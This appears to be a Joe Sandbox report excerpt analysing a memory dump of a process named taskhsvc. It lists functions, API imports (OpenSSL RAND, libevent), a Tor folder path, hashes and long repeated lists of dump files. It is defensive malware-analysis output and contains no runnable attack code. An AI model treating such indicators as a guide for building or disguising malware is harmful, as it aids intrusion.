Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail_getcwd
String ID: C:\Users\user\AppData\Roaming\tor$c9$b
API String ID: 4080616277-1567954491
Opcode ID: c2dfe6d3b6ab5eed057a1ace0cb449269fcbb3e91d45eff84f21a9b12de53690
Instruction ID: cf71cb2fab55cc0d6f0ce6b72c8bb4432c722c16f67e8c7d755af171cd1343cb
Opcode Fuzzy Hash: c2dfe6d3b6ab5eed057a1ace0cb449269fcbb3e91d45eff84f21a9b12de53690
Instruction Fuzzy Hash: 264108B49043199FDB14EF28C989799BBF0BF44304F01C8A9E5889B354E775E984CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00E575C0 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 90COMMON

Download Yara Rule

APIs

time.MSVCRT ref: 00E575F0

Part of subcall function 00DEF792: __stack_chk_fail.LIBSSP-0(?,?,?,?,?,00DD6074), ref: 00DEF7B2

abort.MSVCRT ref: 00E57690
abort.MSVCRT ref: 00E576E2
event_add.LIBEVENT-2-0-5 ref: 00E57713
__stack_chk_fail.LIBSSP-0 ref: 00E57724

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE6586
Part of subcall function 00EE6562: strrchr.MSVCRT ref: 00EE659C
Part of subcall function 00EE6562: __stack_chk_fail.LIBSSP-0 ref: 00EE6601

Part of subcall function 00EE9764: __stack_chk_fail.LIBSSP-0 ref: 00EE9857

Strings

A, xrefs: 00E576D2

Memory Dump Source

Source File: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: __stack_chk_fail$abortstrrchr$event_addtime
String ID: A
API String ID: 2004909516-3554254475
Opcode ID: dd79bdc11cdea7f7e87347ca178fb0d65cfc70e63c5ccc7ecb5186826da85696
Instruction ID: 5fe0f0974f6ba33cfc05f5d301197dd0db6148982c2e780de2742510c679fabe
Opcode Fuzzy Hash: dd79bdc11cdea7f7e87347ca178fb0d65cfc70e63c5ccc7ecb5186826da85696
Instruction Fuzzy Hash: 2741D4B490870ADFCB04EFA9C18569EBBF0FF48304F108819E888A7345D7789984CF62

Uniqueness

Uniqueness Score: -1.00%

Function 00D912F9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 76stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00D9134A
strlen.MSVCRT ref: 00D9136A
malloc.MSVCRT ref: 00D91375
memcpy.MSVCRT ref: 00D91391
_cexit.MSVCRT ref: 00D913FF

Strings

:[#, xrefs: 00D913B1

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: malloc$_cexitmemcpystrlen
String ID: :[#
API String ID: 701060287-4186674397
Opcode ID: 64ed2661df4e922e530654a5152c5e20eb1c1e3454b5429f4f16115dbf5ca4d3
Instruction ID: 96a657aeaf2091e6b47007b3bc2ab2c807cd610386b325c5e5b860d37e233801
Opcode Fuzzy Hash: 64ed2661df4e922e530654a5152c5e20eb1c1e3454b5429f4f16115dbf5ca4d3
Instruction Fuzzy Hash: 013114B5A043069FDB20DFA9D58175DB7F1FB89340F09842DE8C897325D73AA806DB61

Uniqueness

Uniqueness Score: -1.00%

Function 00D912E9 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 73stringCOMMON

Download Yara Rule

APIs

malloc.MSVCRT ref: 00D9134A
strlen.MSVCRT ref: 00D9136A
malloc.MSVCRT ref: 00D91375
memcpy.MSVCRT ref: 00D91391
_cexit.MSVCRT ref: 00D913FF

Strings

:[#, xrefs: 00D913B1

Memory Dump Source

Source File: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860603853.0000000000FA0000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860841214.0000000000FA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860901798.0000000000FA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860974828.0000000000FA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861014940.0000000000FA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861137520.0000000000FB0000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861198889.0000000000FB1000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861243870.0000000000FB4000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861314458.0000000000FB5000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861467336.0000000000FC6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861579941.0000000000FCE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861614958.0000000000FCF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861670386.0000000000FD0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861748077.0000000000FD2000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861787893.0000000000FD3000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861850587.0000000000FD5000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5861934375.0000000000FDB000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5862071337.0000000000FDC000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.000000000106D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863419265.0000000001072000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863649862.0000000001073000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5863820160.0000000001078000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_31_2_d90000_taskhsvc.jbxd

Similarity

API ID: malloc$_cexitmemcpystrlen
String ID: :[#
API String ID: 701060287-4186674397
Opcode ID: bfe20cd2912c113284254b5fd61877e5ad9e86f05443a2ac639669721d6abb70
Instruction ID: d2e743e3fe1512950da305e03dbfbb82609707f9c5f4e03d12b2ca2963d7181e
Opcode Fuzzy Hash: bfe20cd2912c113284254b5fd61877e5ad9e86f05443a2ac639669721d6abb70
Instruction Fuzzy Hash: 8D3103B4A043069FDB20DFA9D58175DB7F1FB88340F05852DE8C8A7325D739A806DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00F0CC1C Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

RAND_poll.LIBEAY32 ref: 00F0CC3A
RAND_seed.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00F05F8E), ref: 00F0CC9E
RAND_status.LIBEAY32(?,?,?,?,?,?,?,?,?,?,?,?,?,00F05F8E), ref: 00F0CCCA
__stack_chk_fail.LIBSSP-0(?,?,?,?,?,?,?,?,?,?,?,?,?,00F05F8E), ref: 00F0CCEB

Part of subcall function 00EE3842: __stack_chk_fail.LIBSSP-0 ref: 00EE38B7

Strings

, xrefs: 00F0CC90
, xrefs: 00F0CCA3

Memory Dump Source

Source File: 0000001F.00000002.5858303183.0000000000EAC000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00D90000, based on PE: true

Associated: 0000001F.00000002.5854081625.0000000000D90000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854203306.0000000000D91000.00000020.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854387878.0000000000D99000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5854495577.0000000000D9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855669844.0000000000DF5000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855788620.0000000000DF8000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855906271.0000000000DFF000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5855950533.0000000000E00000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856575762.0000000000E36000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5856653087.0000000000E37000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857175736.0000000000E5B000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857265036.0000000000E5C000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857335774.0000000000E5D000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857418713.0000000000E60000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857928657.0000000000EA3000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5857985242.0000000000EA4000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858044359.0000000000EA6000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858101275.0000000000EA7000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858156005.0000000000EA8000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858206252.0000000000EA9000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858259149.0000000000EAA000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5858894722.0000000000F18000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5859972934.0000000000F8A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860201875.0000000000F93000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860237968.0000000000F94000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860306169.0000000000F96000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860376222.0000000000F9A000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860436959.0000000000F9C000.00000080.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860505344.0000000000F9E000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000001F.00000002.5860568151.0000000000F9F000.00000080.00000001.01000000.0000000A.sdmpDownload File
